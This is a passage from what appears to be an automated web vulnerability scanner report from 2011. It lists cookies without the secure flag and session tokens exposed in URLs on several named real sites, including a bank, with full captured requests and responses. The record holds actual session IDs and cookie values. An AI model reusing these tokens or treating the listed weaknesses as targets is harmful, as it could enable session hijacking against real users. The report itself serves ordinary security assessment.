<html xmlns="http://www.w3.org/1999/xhtml" style="overflow:hidden;"
...[SNIP]...

10.7. https://eprocurement.eni.it/default.asp

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://eprocurement.eni.it
Path:   /default.asp

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /default.asp HTTP/1.1
Host: eprocurement.eni.it
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 02 May 2011 22:24:13 GMT
Server: Microsoft-IIS/6.0
Content-Length: 20899
Content-Type: text/html
Set-Cookie: view=id=%2C2%2C; path=/
Set-Cookie: option=i%5Fid%5Flang=2; expires=Tue, 01-May-2012 22:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDCQBDSQRQ=DJHFOBHDKCGMFLBFLDPOIJJP; path=/
Cache-control: private


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <meta http-e
...[SNIP]...

10.8. https://secure.mightyblue.com/default.asp

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://secure.mightyblue.com
Path:   /default.asp

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /default.asp HTTP/1.1
Host: secure.mightyblue.com
Connection: keep-alive
Referer: http://mightyblue.com/
Cache-Control: max-age=0
Origin: http://mightyblue.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Content-Length: 107

selInterface=standard_XP&returnurl=http%3A%2F%2Fwww.mightyblue.com&txtUsername=&txtPassword=&submit22=Login

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 21:20:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
pragma: no-cache
cache-control: private
Content-Length: 5889
Content-Type: text/html
Expires: Sun, 01 May 2011 21:20:34 GMT
Set-Cookie: HELM=Interface=&NonSecureReturnURL=; expires=Tue, 01-May-2012 07:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDCCABDABT=EEAKGJPDHNEFBMHOCDHJNHLA; path=/
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Helm : The Web Hosting Control System</title>
<link rel="icon" href="/favicon.ico" type="image/x-icon" />
<lin
...[SNIP]...

10.9. https://secure.mightyblue.com/default.asp

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://secure.mightyblue.com
Path:   /default.asp

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

POST /default.asp HTTP/1.1
Host: secure.mightyblue.com
Connection: keep-alive
Referer: http://mightyblue.com/
Cache-Control: max-age=0
Origin: http://mightyblue.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Content-Length: 107

selInterface=standard_XP&returnurl=http%3A%2F%2Fwww.mightyblue.com&txtUsername=&txtPassword=&submit22=Login

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 21:27:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
pragma: no-cache
cache-control: private
Content-Length: 5889
Content-Type: text/html
Expires: Sun, 01 May 2011 21:27:32 GMT
Set-Cookie: HELM=Interface=&NonSecureReturnURL=; expires=Tue, 01-May-2012 07:00:00 GMT; path=/
Set-Cookie: ASPSESSIONIDCCBBBCAS=INBIJAJDCGCANBAFADADOAKF; path=/
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Helm : The Web Hosting Control System</title>
<link rel="icon" href="/favicon.ico" type="image/x-icon" />
<lin
...[SNIP]...

10.10. https://www.sciencedirect.com/science

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.sciencedirect.com
Path:   /science

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /science?_ob=RegistrationURL&_method=display&_type=guest&_returnURL=http%3A%2F%2Fwww.sciencedirect.com%2Fscience%3F&_acct=C000050221&_version=1&_userid=10&md5=45e26359c93486a3badd56805f2eba73 HTTP/1.1
Host: www.sciencedirect.com
Connection: keep-alive
Referer: http://www.sciencedirect.com/science/journal/09574174
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: EUID=4d15f4a8-7503-11e0-b300-00008a0c593d; MIAMISESSION=4d1567b8-7503-11e0-b300-00008a0c593d:3481824585; TARGET_URL=fcf74dd786744d87fbaaaf8652a764ab4a79b0d3ed681139e910692376063105b57efc9f763ef87b0f182b22962ff5424f96d9e5b6030b75; MIAMIAUTH=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; BROWSER_SUPPORTS_COOKIES=1

Response

HTTP/1.0 200 OK
Date: Mon, 02 May 2011 21:30:41 GMT
Last-Modified: Mon, 02 May 2011 21:30:41 GMT
Set-Cookie: MIAMISESSION=4d1567b8-7503-11e0-b300-00008a0c593d:3481824641; path=/; domain=.sciencedirect.com; HttpOnly;
Content-Type: text/html
Expires: Tue, 01 Jan 1980 04:00:00 GMT
X-RE-Ref: 0 -1136083128
Server: www.sciencedirect.com 9999 138.12.6.33:443
P3P: CP="IDC DSP LAW ADM DEV TAI PSA PSD IVA IVD CON HIS TEL OUR DEL SAM OTR IND OTC"


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "_http://www.w3.org/TR/html4/loose.dtd" >
<html>
<head>


<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<!-- TRA
...[SNIP]...

10.11. https://www.webank.it/webankpub/wb/2l/do/aol/wbwsPUaol0.do

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.webank.it
Path:   /webankpub/wb/2l/do/aol/wbwsPUaol0.do

Issue detail

The following cookies were issued by the application and do not have the secure flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webankpub/wb/2l/do/aol/wbwsPUaol0.do?tabId=nav_pub_wb_conti_nw&OBS_KEY=pro_wbn_apri_conto_webank HTTP/1.1
Host: www.webank.it
Connection: keep-alive
Referer: http://www.webank.it/lndpage/promo321.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 00:08:19 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: webank_sessionId=0000w9xWq7hivnPBssNwcbAxeR4:13flmgm87; Path=/
Set-Cookie: WsId=130438129946916680041160.75183102876704720416; Expires=Wed, 02 May 2012 00:08:18 GMT; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-15
Content-Language: en-US
Content-Length: 26754

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
   

       <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="it">    

<head>
   <titl
...[SNIP]...

10.12. https://feedback.live.com/default.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   https://feedback.live.com
Path:   /default.aspx

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /default.aspx HTTP/1.1
Host: feedback.live.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 02 May 2011 22:24:25 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: MSIDCookie=5a1b6f4a-11e7-4f95-b279-8f8c261c145c; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 15547

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en-us" xml:lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><hea
...[SNIP]...

11. Session token in URL
There are 8 instances of this issue:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.


11.1. http://job24.ilsole24ore.com/news/Articoli/2011/04/bertolino-Consumer-Retention-Management-aprile-2011.php

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://job24.ilsole24ore.com
Path:   /news/Articoli/2011/04/bertolino-Consumer-Retention-Management-aprile-2011.php

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /news/Articoli/2011/04/bertolino-Consumer-Retention-Management-aprile-2011.php HTTP/1.1
Host: job24.ilsole24ore.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:29:33 GMT
Server: Apache/2.0.46 (CentOS)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Connection: close
Content-Type: text/html; charset=ISO8859-1
Content-Length: 33489

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


           <html xmlns="http://www.w3.org/1999/xhtml">
               <head>                    <title>Reality
...[SNIP]...
</a><a class="tab_art" href="http://qs.job24.ilsole24ore.com/sole_index.php?module=school_search&amp;page=results&amp;PHPSESSID=rtksooe85r2q5a3mc6csvc9a53">Top MBA</a>
...[SNIP]...

11.2. https://ui.zanox-affiliate.de/bin/z_in_frm.dll

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://ui.zanox-affiliate.de
Path:   /bin/z_in_frm.dll

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /bin/z_in_frm.dll?1001100210030&0C0&981304374572_11-1 HTTP/1.1
Host: ui.zanox-affiliate.de
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: e_lt=1304392580005%2C1; ed_u_s=%2C-1%2C0.1.2.8.9; e_se=0

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:27:22 GMT
Server: Microsoft-IIS/6.0
P3P: policyref="http://ui.zanox-affiliate.de/w3c/p3p.xml", CP="NOI CUR OUR STP"
X-Powered-By: ASP.NET
Content-Type: text/html
Content-Length: 34062


<!-- Template : 1012 - master_form_lo.htz - 1482 -->
<!-- Sprache : en - enen - 2 (Instanz: (default), Program: undefiniert) -->
<!-- Precomp : Freitag, 29. Mai 2009 11:33:07 von: "fvo" (Unicod
...[SNIP]...
<!-- Precomp : Dienstag, 23. Februar 2010 15:02:36 von: "mre" (Unicode-Verarbeitung) -->

<img width="1" height="1" src="https://www.zanox-affiliate.de/ppl/bin/z_dtqp.dll?53C1532755344&SessionID=[[20110503002722C451220491]]"><img width="1" height="1" src="https://ad.zanox.com/ppl/bin/z_dtqp.dll?53C1532755344&SessionID=[[20110503002722C451220491]]">
<script language="JavaScript">
...[SNIP]...

11.3. http://web.progress.com/docs/gated/campaigns/bpm_search3.htm

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://web.progress.com
Path:   /docs/gated/campaigns/bpm_search3.htm

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /docs/gated/campaigns/bpm_search3.htm HTTP/1.1
Host: web.progress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache
Location: http://www.progress.com/SmCreateCookie.ccc?SMSESSION=QUERY&PERSIST=0&TARGET=-SM-HTTP%3a%2f%2fweb%2eprogress%2ecom%2fam%2fsec%2fprocessRequest%3ftargetUrl%3d%2fdocs%2fgated%2fcampaigns%2fbpm_search3%2ehtm%3f
Content-Length: 398
Content-Type: text/html; charset=iso-8859-1
Date: Mon, 02 May 2011 22:27:13 GMT
Connection: close
Set-Cookie: Apache=24.143.196.31.214591304375233885; expires=Wed, 28-Dec-2011 22:27:13 GMT; path=/
Cache-Control: no-store

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://www.progress.com/SmCreateCookie.ccc?SMSESSION=QUERY&amp;PERSIST=0&amp;TARGET=-SM-HTTP%3a%2f%2fweb%2eprogress%2ecom%2fam%2fsec%2fprocessRequest%3ftargetUrl%3d%2fdocs%2fgated%2fcampaigns%2fbpm_search3%2ehtm%3f">here</a>
...[SNIP]...

11.4. http://www.autostrade.it/videoXml/previsioni-videoListSmall-it.xml

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.autostrade.it
Path:   /videoXml/previsioni-videoListSmall-it.xml

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /videoXml/previsioni-videoListSmall-it.xml?token=1304392414659 HTTP/1.1
Host: www.autostrade.it
Proxy-Connection: keep-alive
Referer: http://www.autostrade.it/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml, text/xml, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=99A6B622412B24DBC05018F5AF4B46BC.bau10

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:14:03 GMT
Server: Autostrade
Last-Modified: Mon, 02 May 2011 19:40:06 GMT
ETag: "109e8-229a-4a25030c2d180"
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
Content-Type: application/xml
Content-Language: it
Content-Length: 8858

<?xml version="1.0" encoding="UTF-8"?>
<videoMediaListResponse>
<objects>


<videoMediaEntry>

<dataUrl>280420112200</dataUrl>
<plays>3</plays>

<views>9</views
...[SNIP]...

11.5. http://www.computerworld.com/s/article/9214732/Semantic_Web_Tools_you_can_use

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.computerworld.com
Path:   /s/article/9214732/Semantic_Web_Tools_you_can_use

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /s/article/9214732/Semantic_Web_Tools_you_can_use HTTP/1.1
Host: www.computerworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Content-Language: en
Content-Type: text/html; charset=UTF-8
Eirxpes: Mon, 02 May 2011 22:33:54 GMT
Cneonction: close
chCae-Control: private
ETag: "KXAOEEJGPLSUQMTSV"
Cache-Control: public, max-age=226
Expires: Mon, 02 May 2011 22:33:41 GMT
Date: Mon, 02 May 2011 22:29:55 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 133043

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<script type="text/javascri
...[SNIP]...
</script>
       <script type="text/javascript" src="http://api.demandbase.com/api/v1/ip.json?token=4aa25eb10e6f9884a91e9805c3fcb58ec1cd8407&callback=dbase_parse"></script>
...[SNIP]...

11.6. http://www.facebook.com/extern/login_status.php

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.facebook.com
Path:   /extern/login_status.php

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /extern/login_status.php?api_key=111239619098&ok_session=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_04_0_906814%26sId%3D0%23status%3Dconnected&no_session=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_04_0_906814%26sId%3D0%23status%3DnotConnected&no_user=http%3A%2F%2Fwww.bing.com%2Ffd%2Ffb%2Fu%3Fv%3D7_04_0_906814%26sId%3D0%23status%3Dunknown&session_version=3&extern=2 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/fd/fb/r?v=7_04_0_906814&sId=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=ituyTcnawc6q7VcE0gibPCo2; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252Fhp%253F%2526MKT%253Den-us%26extra_2%3DUS

Response

HTTP/1.1 302 Found
Location: http://www.bing.com/fd/fb/u?v=7_04_0_906814&sId=0#status=unknown
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.44.65
X-Cnection: close
Date: Mon, 02 May 2011 21:28:57 GMT
Content-Length: 0


11.7. http://www.shopping24.ilsole24ore.com/sh4/catalog/Category.jsp

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.shopping24.ilsole24ore.com
Path:   /sh4/catalog/Category.jsp

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /sh4/catalog/Category.jsp?CATID=SH246140 HTTP/1.1
Host: www.shopping24.ilsole24ore.com
Proxy-Connection: keep-alive
Referer: http://www.banchedati.ilsole24ore.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_lastvisit=1304392432179; s_vi=[CS]v1|26DF9655051D19B5-40000103E0001B23[CE]; s_cm_NW=undefinedburpburp; s_cc=true; s_nr=1304393236452-New; SC_LINKS_NW=%5B%5BB%5D%5D; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:32:12 GMT
Set-Cookie: JSESSIONID=D34A5D9383893442C0CECE0969DFDC09; Path=/
Set-Cookie: ATG_SESSION_ID=D34A5D9383893442C0CECE0969DFDC09; Path=/
X-ATG-Version: ATGPlatform/9.0p1 [ DPSLicense/0 ]
Content-Type: text/html;charset=ISO-8859-1
Connection: close
Content-Length: 53599

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="Cont
...[SNIP]...
<span><a href="http://www.shopping24.ilsole24ore.com/sh4/catalog/categories/rss.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?CATID=SH246140">RSS</a>
...[SNIP]...
<label><a href="/sh4/catalog/search/ricercaAvanzata.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09">&rsaquo; Ricerca avanzata</a>
...[SNIP]...
<p>
   <a href="/sh4/catalog/order/cart.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09"><img src="/sh4/img/button-carrello.gif" width="37" height="26" alt="Carrello" title="Carrello" /></a><a href="/sh4/catalog/order/statoOrdine.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09"><img src="/sh4/img/button-statoordini-new.gif" width="82" height="26" alt="Stato degli ordini" title="Stato degli ordini"/></a><a href="/sh4/catalog/help/sh24-help.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09"><img src="/sh4/img/button-aiuto-new.gif" width="44" height="26" alt="Aiuto" title="Aiuto"/>
...[SNIP]...
<li><a href="/sh4/catalog/Category.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09">Home</a>
...[SNIP]...
<li><a href="/sh4/catalog/Category.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?CATID=SH246048"><img src="/sh4/img/ico_libri.gif" alt="" title=""/>
...[SNIP]...
<li><a href="/sh4/catalog/Category.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?CATID=SH246200477"><img src="/sh4/img/ico_libri.gif" alt="" title=""/>
...[SNIP]...
<li><a href="/sh4/catalog/Category.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?CATID=SH246140"><img src="/sh4/img/ico_periodici.gif" alt="" title=""/>
...[SNIP]...
<li>
<a href="/sh4/catalog/Category.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?CATID=SH246176">
               &nbsp;Agricoltura e Agroalimentare</a>
...[SNIP]...
<li>
<a href="/sh4/catalog/Category.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?CATID=SH246174">
               &nbsp;Ambiente e Sicurezza</a>
...[SNIP]...
<li>
<a href="/sh4/catalog/Category.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?CATID=SH245109662">
               &nbsp;Architettura</a>
...[SNIP]...
<li>
<a href="/sh4/catalog/Category.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?CATID=SH246090278">
               &nbsp;Casa e Arredo</a>
...[SNIP]...
<li>
<a href="/sh4/catalog/Category.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?CATID=SH246170">
               &nbsp;Diritto</a>
...[SNIP]...
<li>
<a href="/sh4/catalog/Category.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?CATID=SH246168">
               &nbsp;Economia D&#39;Impresa</a>
...[SNIP]...
<li>
<a href="/sh4/catalog/Category.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?CATID=cat550009">
               &nbsp;Economia e Finanza</a>
...[SNIP]...
<li>
<a href="/sh4/catalog/Category.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?CATID=SH246166">
               &nbsp;Edilizia e Urbanistica</a>
...[SNIP]...
<li>
<a href="/sh4/catalog/Category.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?CATID=SH246090274">
               &nbsp;Elettronica e TLC</a>
...[SNIP]...
<li>
<a href="/sh4/catalog/Category.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?CATID=SH246164">
               &nbsp;Enti Locali</a>
...[SNIP]...
<li>
<a href="/sh4/catalog/Category.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?CATID=SH246162">
               &nbsp;Fisco</a>
...[SNIP]...
<li>
<a href="/sh4/catalog/Category.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?CATID=SH246090128">
               &nbsp;HoReCa</a>
...[SNIP]...
<li>
<a href="/sh4/catalog/Category.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?CATID=SH246144">
               &nbsp;Immobili</a>
...[SNIP]...
<li>
<a href="/sh4/catalog/Category.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?CATID=SH246158">
               &nbsp;Informazione Generale</a>
...[SNIP]...
<li>
<a href="/sh4/catalog/Category.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?CATID=SH246156">
               &nbsp;Lavoro</a>
...[SNIP]...
<li>
<a href="/sh4/catalog/Category.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?CATID=SH246142">
               &nbsp;Pubblica Amministrazione</a>
...[SNIP]...
<li>
<a href="/sh4/catalog/Category.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?CATID=SH246090126">
               &nbsp;Retail</a>
...[SNIP]...
<li>
<a href="/sh4/catalog/Category.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?CATID=SH246152">
               &nbsp;Sanit.</a>
...[SNIP]...
<li>
<a href="/sh4/catalog/Category.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?CATID=SH246150">
               &nbsp;Scuola</a>
...[SNIP]...
<li>
<a href="/sh4/catalog/Category.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?CATID=cat90002">
               &nbsp;Societ.</a>
...[SNIP]...
<li>
<a href="/sh4/catalog/Category.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?CATID=SH246148">
               &nbsp;Societ. e Trasporti</a>
...[SNIP]...
<li>    <a href="/sh4/catalog/Category.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?CATID=SH246090130">
           &nbsp;Telecomunicazioni e ICT</a>
...[SNIP]...
<li><a href="/sh4/catalog/Category.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?CATID=SH245868"><img src="/sh4/img/ico_software.gif" alt="" title=""/>
...[SNIP]...
<li><a href="/sh4/catalog/Category.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?CATID=SH245680"><img src="/sh4/img/ico_corsi.gif" alt="" title=""/>
...[SNIP]...
<li><a href="/sh4/catalog/Category.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?CATID=SH245976"><img src="/sh4/img/ico_serviziOnLine.gif" alt="" title=""/>
...[SNIP]...
<li><a href="/sh4/catalog/Category.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?CATID=SH246087709"><img src="/sh4/img/ico_alinari.gif" alt="" title=""/>
...[SNIP]...
<li><a href="/sh4/catalog/Category.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?CATID=SH246096938"><img src="/sh4/img/ico_dvd.gif" alt="" title=""/>
...[SNIP]...
<li><a href="/sh4/catalog/Category.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?CATID=cat790003"><img src="/sh4/img/ico_regalbox.gif" alt="" title=""/>
...[SNIP]...
<li><a href="/sh4/catalog/Category.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?CATID=cat790019"><img src="/sh4/img/ico_bottiglie.gif" alt="" title=""/>
...[SNIP]...
<li>
       <a href="/sh4/catalog/Category.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?CATID=Shopping24Collaterals"><img src="/ProductRelated/small_images/ico_collana.gif" alt="stellina" style="margin-right:5px;"/>
...[SNIP]...
<li>
       <a href="/sh4/catalog/Category.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?CATID=cat850017"><img src="/ProductRelated/small_images/ico_italia.jpg" alt="stellina" style="margin-right:5px;"/>
...[SNIP]...
<li>
       <a href="/sh4/catalog/Category.jsp;jsessionid=D34A5D9383893442C0CECE0969DFDC09?CATID=cat860002"><img src="/ProductRelated/small_images/servizi_cittadino.gif" alt="stellina" style="margin-right:5px;"/>
...[SNIP]...
